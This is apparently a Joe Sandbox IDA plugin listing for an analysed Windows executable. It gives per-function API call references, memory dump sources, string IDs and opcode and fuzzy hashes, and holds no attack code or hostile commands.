                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: ba00eed722582efd8d54c8d622483ff2afdbff299c62e4f4bad8c886240a7241
                    • Instruction ID: 7830611b7099bcab730d472afea017144b44b06f7345f37410367506882f5e77
                    • Opcode Fuzzy Hash: ba00eed722582efd8d54c8d622483ff2afdbff299c62e4f4bad8c886240a7241
                    • Instruction Fuzzy Hash: AA316D31105119EBDF159FB4DC09FDA3BAAFF09724F11422DFA15A61A0CB39D821DBA4
                    APIs
                    • _memset.LIBCMT ref: 0076707B
                      • Part of subcall function 00768D68: __getptd_noexit.LIBCMT ref: 00768D68
                    • __gmtime64_s.LIBCMT ref: 00767114
                    • __gmtime64_s.LIBCMT ref: 0076714A
                    • __gmtime64_s.LIBCMT ref: 00767167
                    • __allrem.LIBCMT ref: 007671BD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007671D9
                    • __allrem.LIBCMT ref: 007671F0
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0076720E
                    • __allrem.LIBCMT ref: 00767225
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00767243
                    • __invoke_watson.LIBCMT ref: 007672B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction ID: 3b310847c9de38a220455a5ef1d5c2b70665dbee75ca86533d60aaadfd52eb9e
                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                    • Instruction Fuzzy Hash: 62711971A04706EBDB189E78CC41B5AB3B8BF113A8F14822AFC15E7681E778D940C7A0
                    APIs
                    • _memset.LIBCMT ref: 007A2A31
                    • GetMenuItemInfoW.USER32(00806890,000000FF,00000000,00000030), ref: 007A2A92
                    • SetMenuItemInfoW.USER32(00806890,00000004,00000000,00000030), ref: 007A2AC8
                    • Sleep.KERNEL32(000001F4), ref: 007A2ADA
                    • GetMenuItemCount.USER32(?), ref: 007A2B1E
                    • GetMenuItemID.USER32(?,00000000), ref: 007A2B3A
                    • GetMenuItemID.USER32(?,-00000001), ref: 007A2B64
                    • GetMenuItemID.USER32(?,?), ref: 007A2BA9
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007A2BEF
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A2C03
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A2C24
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: 63f3c77a391f93bd7908b7cbc7dc6445678efc86f74a99e1744f20947a77ff8c
                    • Instruction ID: d9ee4ad0d84f1a7eaf26f1f4fd6f29280714083bddc63a3a534f9f834cbe52b8
                    • Opcode Fuzzy Hash: 63f3c77a391f93bd7908b7cbc7dc6445678efc86f74a99e1744f20947a77ff8c
                    • Instruction Fuzzy Hash: 3E61B4B0900249EFDB11CF58DD88DBEBBB9FB86314F144659E84193252E739AD16DB30
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007C7214
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007C7217
                    • GetWindowLongW.USER32(?,000000F0), ref: 007C723B
                    • _memset.LIBCMT ref: 007C724C
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C725E
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007C72D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 1d408d121f601613c2f284480233eaf5fb6e5a3ed5a3a03f1a184e85342eaa23
                    • Instruction ID: 37c62cec3a6cbe88d8972d9188e22f3d5dd30ebca521a375a0b0eaf9ac8c5201
                    • Opcode Fuzzy Hash: 1d408d121f601613c2f284480233eaf5fb6e5a3ed5a3a03f1a184e85342eaa23
                    • Instruction Fuzzy Hash: CF615871A00248AFDB14DFA4CC81EEE77F8EB09710F144169FA14A72A1DB74AA55DF60
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00797135
                    • SafeArrayAllocData.OLEAUT32(?), ref: 0079718E
                    • VariantInit.OLEAUT32(?), ref: 007971A0
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 007971C0
                    • VariantCopy.OLEAUT32(?,?), ref: 00797213
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00797227
                    • VariantClear.OLEAUT32(?), ref: 0079723C
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00797249
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00797252
                    • VariantClear.OLEAUT32(?), ref: 00797264
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0079726F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: 8e515826af61692d50d6b64540ad19c13bc38ce89b427dbfedaa0a40d6f3e76e
                    • Instruction ID: 4d286ee817964f5c8e68c46d4e7bcdc9bcf67acfeb8b373cb9e741d263aea7bc
                    • Opcode Fuzzy Hash: 8e515826af61692d50d6b64540ad19c13bc38ce89b427dbfedaa0a40d6f3e76e
                    • Instruction Fuzzy Hash: EE413D75A10219EFCF08DF64DC48DAEBBB9FF48354F00C069E915A7261DB38AA45CB90
                    APIs
                      • Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
                      • Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C
                    • CoInitialize.OLE32 ref: 007B8718
                    • CoUninitialize.OLE32 ref: 007B8723
                    • CoCreateInstance.OLE32(?,00000000,00000017,007D2BEC,?), ref: 007B8783
                    • IIDFromString.OLE32(?,?), ref: 007B87F6
                    • VariantInit.OLEAUT32(?), ref: 007B8890
                    • VariantClear.OLEAUT32(?), ref: 007B88F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 834269672-1287834457
                    • Opcode ID: 1e22b381958521c19f7f59c500e01ce6f232b03aeea4f1a1c83b485c09d8141c
                    • Instruction ID: bb3511a7a95ed869154db2e95034762c096fdc233b57cba39c7847dfd7e915aa
                    • Opcode Fuzzy Hash: 1e22b381958521c19f7f59c500e01ce6f232b03aeea4f1a1c83b485c09d8141c
                    • Instruction Fuzzy Hash: DE617A70608301EFD750DF64C848BAABBE8AF89714F14491DF9859B291DB78ED48CB93
                    APIs
                    • WSAStartup.WSOCK32(00000101,?), ref: 007B5AA6
                    • inet_addr.WSOCK32(?), ref: 007B5AEB
                    • gethostbyname.WSOCK32(?), ref: 007B5AF7
                    • IcmpCreateFile.IPHLPAPI ref: 007B5B05
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007B5B75
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007B5B8B
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007B5C00
                    • WSACleanup.WSOCK32 ref: 007B5C06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: 8109bb38017b5a247a7b7a2a67074dc800d9835562a1eecddd19a0e87a3710ac
                    • Instruction ID: a4d8fde6644ad48a2ae4c28e3979987c08991ea62bee27868c56caf97e35befd
                    • Opcode Fuzzy Hash: 8109bb38017b5a247a7b7a2a67074dc800d9835562a1eecddd19a0e87a3710ac
                    • Instruction Fuzzy Hash: 09516D71604B01DFDB10AF24CC89B6BBBE5EF48710F14892AF956DB2A1DB78E840CB55
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 007AB73B
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007AB7B1
                    • GetLastError.KERNEL32 ref: 007AB7BB
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 007AB828
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: 7bbf5731df655c913d56af9304814f3aad466dbc5b1bafab2051090b7736f5d6
                    • Instruction ID: 366c9d5519b0c0af4d4782a8de7edd590e99d5e3b179f170b2a6336675e21c07
                    • Opcode Fuzzy Hash: 7bbf5731df655c913d56af9304814f3aad466dbc5b1bafab2051090b7736f5d6
                    • Instruction Fuzzy Hash: A5318575A00209EFDB00EF64C885ABE7BB4EFC6750F14812AE505D7292DBB99941C791
                    APIs
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                      • Part of subcall function 0079B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0079B0E7
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007994F6
                    • GetDlgCtrlID.USER32 ref: 00799501
                    • GetParent.USER32 ref: 0079951D
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00799520
                    • GetDlgCtrlID.USER32(?), ref: 00799529
                    • GetParent.USER32(?), ref: 00799545
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00799548
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 9f442322ec5552cf052f44d96db22a8cd6a84f9bb05c1ebb2190b8c5ec9efc31
                    • Instruction ID: 13c7c4f458d6d5ece8d55d014bec3a75ddfa385ff6a7f5a611b47205ccea3199
                    • Opcode Fuzzy Hash: 9f442322ec5552cf052f44d96db22a8cd6a84f9bb05c1ebb2190b8c5ec9efc31
                    • Instruction Fuzzy Hash: 0821B270A00108FBDF05AB64DC89EFEBB65EF49300F104119F661972E2DB7D5919DB20
                    APIs
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                      • Part of subcall function 0079B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0079B0E7
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007995DF
                    • GetDlgCtrlID.USER32 ref: 007995EA
                    • GetParent.USER32 ref: 00799606
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00799609
                    • GetDlgCtrlID.USER32(?), ref: 00799612
                    • GetParent.USER32(?), ref: 0079962E
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00799631
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 786269c628f38623c0a2045fe9d4138de50d4683b81e7086e8f3f0098588a3c4
                    • Instruction ID: 61be02d7d182cb77f4e31bcc8811686a4bf0c8fb3dec9e16a968d347cfc54180
                    • Opcode Fuzzy Hash: 786269c628f38623c0a2045fe9d4138de50d4683b81e7086e8f3f0098588a3c4
                    • Instruction Fuzzy Hash: 67217474A00108FBDF05AB64DC85EFEBB65EF54300F104159F651972A1DB7D9519DB20
                    APIs
                    • GetParent.USER32 ref: 00799651
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00799666
                    • _wcscmp.LIBCMT ref: 00799678
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007996F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: 03dea3054a9ac53f397d589ae8a4856f69013279baa4a10fe608ef1ee7d5d163
                    • Instruction ID: 4e28c8ebde6c5aa5e4028ef1cb43b49c1b8924f96b89d4f836a1ebeae301211d
                    • Opcode Fuzzy Hash: 03dea3054a9ac53f397d589ae8a4856f69013279baa4a10fe608ef1ee7d5d163
                    • Instruction Fuzzy Hash: 0311EC7624830BFAFE052628FC0BDB6779C9F05760F20012EFF11A51D1FE6E69618A58
                    APIs
                    • __swprintf.LIBCMT ref: 007A419D
                    • __swprintf.LIBCMT ref: 007A41AA
                      • Part of subcall function 007638D8: __woutput_l.LIBCMT ref: 00763931
                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 007A41D4
                    • LoadResource.KERNEL32(?,00000000), ref: 007A41E0
                    • LockResource.KERNEL32(00000000), ref: 007A41ED
                    • FindResourceW.KERNEL32(?,?,00000003), ref: 007A420D
                    • LoadResource.KERNEL32(?,00000000), ref: 007A421F
                    • SizeofResource.KERNEL32(?,00000000), ref: 007A422E
                    • LockResource.KERNEL32(?), ref: 007A423A
                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007A429B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                    • String ID:
                    • API String ID: 1433390588-0
                    • Opcode ID: 8c3f90c5dc3182f30d2c9eafa91dd6fd5e08d9282ef1958c5c300706bf96f7aa
                    • Instruction ID: 7bcd3418b59e150cf5e0062dab717042ebe7e058ce62e950bdc52afc62ef09bb
                    • Opcode Fuzzy Hash: 8c3f90c5dc3182f30d2c9eafa91dd6fd5e08d9282ef1958c5c300706bf96f7aa
                    • Instruction Fuzzy Hash: 4A317071A0521AAFDB119F60DC48EBF7BADFF85301F008629F905D2190E7B9DA51CBA4
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 007A1700
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007A0778,?,00000001), ref: 007A1714
                    • GetWindowThreadProcessId.USER32(00000000), ref: 007A171B
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A0778,?,00000001), ref: 007A172A
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 007A173C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A0778,?,00000001), ref: 007A1755
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007A0778,?,00000001), ref: 007A1767
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007A0778,?,00000001), ref: 007A17AC
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007A0778,?,00000001), ref: 007A17C1
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007A0778,?,00000001), ref: 007A17CC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: 6b2d4320154f45d90a1b855353564e0f7147c955bcc3165f67b881a67a159e9b
                    • Instruction ID: 13fae0d05dcc89b240274d51ba04582dd3a3696ee8f8f9b30a7280168205c307
                    • Opcode Fuzzy Hash: 6b2d4320154f45d90a1b855353564e0f7147c955bcc3165f67b881a67a159e9b
                    • Instruction Fuzzy Hash: 3831C175A00205BFEB119F24DC84F793BFAFB96761F508128F900D62A0DB78AD40CBA4
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: ,,}$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-2286400513
                    • Opcode ID: fbf5c45239de88bb2c8aac7bf8321391ce264e9f3f35214578c24e544bc473bc
                    • Instruction ID: 3d7f4a184b86ffd4a45b69e8a88217d56815dfef92c09f807c263d383ae3ce5b
                    • Opcode Fuzzy Hash: fbf5c45239de88bb2c8aac7bf8321391ce264e9f3f35214578c24e544bc473bc
                    • Instruction Fuzzy Hash: 05918E71A00219ABDF24DFA5C848FEEB7B8EF45714F108159F729AB280D7789945CFA0
